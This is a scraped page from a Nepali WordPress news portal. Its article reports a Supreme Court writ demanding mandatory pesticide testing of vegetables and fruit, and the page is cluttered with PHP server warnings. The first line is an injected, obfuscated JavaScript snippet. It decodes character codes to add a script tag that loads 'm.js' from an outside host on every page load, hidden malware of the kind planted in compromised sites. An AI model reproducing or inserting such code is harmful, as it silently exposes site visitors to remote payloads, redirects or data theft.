Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/includes/hooks.php on line 259

Warning: Cannot modify header information - headers already sent by (output started at /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/jetpack/sal/class.json-api-date.php:1) in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/post-views-counter/includes/counter.php on line 294
सर्वोच्चमा रीट दर्ता, खाद्यान्न तरकारी र फलफूलमा अनिवार्यरुपमा विषादी परीक्षणको माग गर्दै – Nepali News Portal – Trending Nepali News

सर्वोच्चमा रीट दर्ता, खाद्यान्न तरकारी र फलफूलमा अनिवार्यरुपमा विषादी परीक्षणको माग गर्दै

तरकारी र फलफुलमा अनिवार्यरुपमा विषादीको परिक्षण गर्नुपर्ने माग गर्दै सर्वोच्च अदालतमा स्वतन्त्र राष्ट्रिय अभियानका तर्फबाट अधिवक्ता स्वागत नेपाल र नारायणप्रसाद दुवाडीले रीट दर्ता गरेका छन्।

उनीहरुले स्वतन्त्र राष्ट्रिय अभियानका तर्फबाट माग गर्दै भारतबाट आयात भएको तरकारी र फलफुलमात्र नभई नेपालमै उत्पादन हुने तरकारी र फलफूल पनि अनिवार्यरुपमा परीक्षण गराएर मात्रै उपभोक्तामाझ विक्री वितरण गर्नुपर्ने जनाएका छन्।

स्वास्थ्य खान पाउने नागरिकको नैसर्गिक अधिकार भएकोले चेकजाँच गर्ने आवश्यक पूर्वाधार नभएको बहानामा रोकिनु गलत भएको उल्लेख निवेदकहरुले रिटमा प्रष्ट्याएका छन्। सरकारले गत असार २ गते निकासी पैठारीसम्बन्धी आदेश राजपत्रमा प्रकाशित गरी तरकारी तथा फलफूलको सीमा नाकामा विषादी परीक्षण गर्नुपर्ने उल्लेख गर्दै चेकजाँचलाई अघि बढाएको थियो ।जसको भारतीय दूतावासले पत्र लेखेरै विरोध गर्‍यो ।

लगतै सरकारले तयारी नपुगेको र चेकजाँच गर्ने आवश्यक पूर्वाधार नभएको भन्दै ६ महिनालाई विषादी जाँच गर्ने निर्णय स्थगित गर्‍यो । जसको अहिले सर्वत्र विरोध भइरहेको छ ।

nepalitvshow

nepalitvshow

Read Previous

३२ वर्ष पुगिन् प्रियङ्का,जन्मदिन मनाउँदै गर्दा भनिन् : जिम्मेवारी बढेको छ

Read Next

रवि लामिछाने पक्राउको विरोध गर्दै फेसबुकमा लेख्दा पक्राउ

Leave a Reply

Your email address will not be published. Required fields are marked *


Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13

Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13

Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13